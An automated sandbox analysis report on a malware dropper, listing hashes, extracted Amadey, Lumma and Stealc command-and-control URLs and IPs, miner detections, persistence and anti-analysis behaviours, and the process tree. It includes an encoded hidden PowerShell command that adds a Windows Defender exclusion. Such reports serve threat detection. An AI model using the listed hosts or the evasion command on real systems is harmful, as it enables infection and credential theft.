Resubmissions
16/03/2025, 14:27
250316-rslvgaszdx 1016/03/2025, 08:13
250316-j4f5cswsfx 1015/03/2025, 11:26
250315-njwrjawlt6 10Analysis
-
max time kernel
136s -
max time network
269s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
15/03/2025, 11:26
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
random.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
random.exe
-
Size
5.6MB
-
MD5
f0cad0627e4b852e7ce633df29855373
-
SHA1
3187e3016d889fdcb5f3c38cc19c1dac27163fe4
-
SHA256
e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c
-
SHA512
c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615
-
SSDEEP
98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://citydisco.bet/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://4htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://weaponrywo.digital/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x8387.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 93R1PJ3LML991IHAH15X.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3r19R.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 400f34b24d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a47cfd9534.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SAU9CL9T4LCM8EX1AEI8AP2BQI.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7f23b4fca3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1u87m9.exe -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/800-358-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-364-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-366-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-369-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-360-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-362-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-370-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-354-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-356-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-352-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig behavioral1/memory/800-372-0x0000000140000000-0x00000001408C3000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 3920 powershell.exe 3840 powershell.exe 2032 powershell.exe 1148 powershell.exe 3416 powershell.exe 3492 powershell.exe 2856 powershell.exe 1572 powershell.exe 3292 powershell.exe 3420 powershell.exe -
Downloads MZ/PE file 14 IoCs
flow pid Process 10 2996 2x8387.exe 14 2248 rapes.exe 37 772 400f34b24d.exe 16 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe 21 2248 rapes.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a47cfd9534.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SAU9CL9T4LCM8EX1AEI8AP2BQI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 93R1PJ3LML991IHAH15X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3r19R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 400f34b24d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SAU9CL9T4LCM8EX1AEI8AP2BQI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7f23b4fca3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3r19R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 400f34b24d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7f23b4fca3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 93R1PJ3LML991IHAH15X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a47cfd9534.exe -
Executes dropped EXE 22 IoCs
pid Process 1740 u0k28.exe 1752 1u87m9.exe 2248 rapes.exe 2996 2x8387.exe 2052 93R1PJ3LML991IHAH15X.exe 1516 3r19R.exe 1300 9JFiKVm.exe 2084 packed.exe 2892 0000009092.exe 1756 b0hgYat.exe 1696 b0hgYat.exe 2088 Esu6YYl.exe 1548 Esu6YYl.exe 1712 O9s3coZ.exe 2536 Esu6YYl.exe 800 Esu6YYl.exe 1424 j21Hq7C.exe 772 400f34b24d.exe 700 a47cfd9534.exe 2216 79704c4279.exe 2460 SAU9CL9T4LCM8EX1AEI8AP2BQI.exe 2844 7f23b4fca3.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 1u87m9.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 2x8387.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 93R1PJ3LML991IHAH15X.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine a47cfd9534.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 3r19R.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 400f34b24d.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine SAU9CL9T4LCM8EX1AEI8AP2BQI.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 7f23b4fca3.exe -
Loads dropped DLL 64 IoCs
pid Process 2628 random.exe 1740 u0k28.exe 1740 u0k28.exe 1752 1u87m9.exe 1752 1u87m9.exe 2248 rapes.exe 1740 u0k28.exe 1740 u0k28.exe 2996 2x8387.exe 2996 2x8387.exe 2052 93R1PJ3LML991IHAH15X.exe 2628 random.exe 2628 random.exe 1516 3r19R.exe 2248 rapes.exe 1300 9JFiKVm.exe 2864 WerFault.exe 2864 WerFault.exe 2864 WerFault.exe 2864 WerFault.exe 2248 rapes.exe 2084 packed.exe 2084 packed.exe 2084 packed.exe 2892 0000009092.exe 2248 rapes.exe 1756 b0hgYat.exe 1756 b0hgYat.exe 1696 b0hgYat.exe 1696 b0hgYat.exe 2248 rapes.exe 2088 Esu6YYl.exe 872 cmd.exe 1548 Esu6YYl.exe 2248 rapes.exe 1712 O9s3coZ.exe 2964 WerFault.exe 2964 WerFault.exe 2964 WerFault.exe 2964 WerFault.exe 1548 Esu6YYl.exe 1548 Esu6YYl.exe 1332 Process not Found 2404 Process not Found 800 Esu6YYl.exe 2248 rapes.exe 1424 j21Hq7C.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 2248 rapes.exe 2248 rapes.exe 772 400f34b24d.exe 2248 rapes.exe 2248 rapes.exe 700 a47cfd9534.exe 2248 rapes.exe 2216 79704c4279.exe 772 400f34b24d.exe 2460 SAU9CL9T4LCM8EX1AEI8AP2BQI.exe 2248 rapes.exe 2248 rapes.exe 2844 7f23b4fca3.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" u0k28.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\400f34b24d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222710101\\400f34b24d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\a47cfd9534.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222720101\\a47cfd9534.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\79704c4279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222730101\\79704c4279.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" random.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001c8e7-426.dat autoit_exe behavioral1/files/0x0007000000016d3a-661.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1752 1u87m9.exe 2248 rapes.exe 2996 2x8387.exe 2052 93R1PJ3LML991IHAH15X.exe 1516 3r19R.exe 772 400f34b24d.exe 700 a47cfd9534.exe 2460 SAU9CL9T4LCM8EX1AEI8AP2BQI.exe 2844 7f23b4fca3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1548 set thread context of 2536 1548 Esu6YYl.exe 62 PID 1548 set thread context of 800 1548 Esu6YYl.exe 64 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\RuntimeApp\0000009092.exe packed.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1u87m9.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0004000000004ed7-150.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1164 2844 WerFault.exe 86 3164 3444 WerFault.exe 138 -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SAU9CL9T4LCM8EX1AEI8AP2BQI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3r19R.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a47cfd9534.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 79704c4279.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1u87m9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 400f34b24d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 93R1PJ3LML991IHAH15X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 79704c4279.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 79704c4279.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7f23b4fca3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u0k28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x8387.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 872 cmd.exe 1400 PING.EXE -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3156 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe -
Kills process with taskkill 5 IoCs
pid Process 1704 taskkill.exe 1724 taskkill.exe 1608 taskkill.exe 1732 taskkill.exe 1168 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 rapes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 rapes.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1400 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2820 schtasks.exe 2080 schtasks.exe 3904 schtasks.exe 3736 schtasks.exe 3228 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1400 PING.EXE 1548 Esu6YYl.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1752 1u87m9.exe 2248 rapes.exe 2996 2x8387.exe 2996 2x8387.exe 2996 2x8387.exe 2996 2x8387.exe 2996 2x8387.exe 2052 93R1PJ3LML991IHAH15X.exe 1516 3r19R.exe 1148 powershell.exe 1572 powershell.exe 772 400f34b24d.exe 772 400f34b24d.exe 772 400f34b24d.exe 772 400f34b24d.exe 772 400f34b24d.exe 700 a47cfd9534.exe 2460 SAU9CL9T4LCM8EX1AEI8AP2BQI.exe 2216 79704c4279.exe 2844 7f23b4fca3.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeLockMemoryPrivilege 800 Esu6YYl.exe Token: SeLockMemoryPrivilege 800 Esu6YYl.exe Token: SeDebugPrivilege 1732 taskkill.exe Token: SeDebugPrivilege 1168 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 1752 1u87m9.exe 800 Esu6YYl.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe -
Suspicious use of SendNotifyMessage 11 IoCs
pid Process 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe 2216 79704c4279.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 2628 wrote to memory of 1740 2628 random.exe 30 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1740 wrote to memory of 1752 1740 u0k28.exe 31 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1752 wrote to memory of 2248 1752 1u87m9.exe 32 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 1740 wrote to memory of 2996 1740 u0k28.exe 33 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2996 wrote to memory of 2052 2996 2x8387.exe 36 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2628 wrote to memory of 1516 2628 random.exe 37 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 2248 wrote to memory of 1300 2248 rapes.exe 39 PID 1300 wrote to memory of 2864 1300 9JFiKVm.exe 41 PID 1300 wrote to memory of 2864 1300 9JFiKVm.exe 41 PID 1300 wrote to memory of 2864 1300 9JFiKVm.exe 41 PID 1300 wrote to memory of 2864 1300 9JFiKVm.exe 41 PID 1300 wrote to memory of 2864 1300 9JFiKVm.exe 41 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2248 wrote to memory of 2084 2248 rapes.exe 42 PID 2084 wrote to memory of 1148 2084 packed.exe 43 PID 2084 wrote to memory of 1148 2084 packed.exe 43 PID 2084 wrote to memory of 1148 2084 packed.exe 43 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1300 -s 1806⤵
- Loads dropped DLL
PID:2864
-
-
-
C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
